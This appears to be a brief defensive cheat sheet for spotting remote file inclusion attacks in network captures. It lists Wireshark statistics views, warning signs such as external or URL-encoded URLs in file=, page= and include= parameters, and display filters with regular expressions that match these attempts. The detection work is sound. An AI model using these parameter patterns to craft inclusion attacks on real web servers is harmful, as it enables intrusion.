Attacker forces the application to include and execute a remote file via parameters like file=, page=, include=
Hunting
Statistics → Conversations → IPv4
Statistics → Endpoints → IPv4
Statistics → Protocol Hierarchy
Statistics → IO Graph
Red Flags
- Full URLs inside parameters (
http://,https://) file=,page=,include=pointing to external domains- URL-encoded remote references (
http%3A%2F%2F) - Immediate outbound traffic from web server after request
- 200 response followed by suspicious server behavior
Filters
# Generic external URL in parameters
http.request.uri contains "http://" or http.request.uri contains "https://"
# Direct remote URL inclusion attempt
http.request.uri matches "(?i)(file=|page=|include=).*https?://"
# URL-encoded remote inclusion
http.request.uri matches "(?i)(file=|page=|include=).*http%3A%2F%2F"
# Correlate suspicious source
http.request.uri matches "(?i)(file=|page=|include=)" and ip.src == 192.168.10.5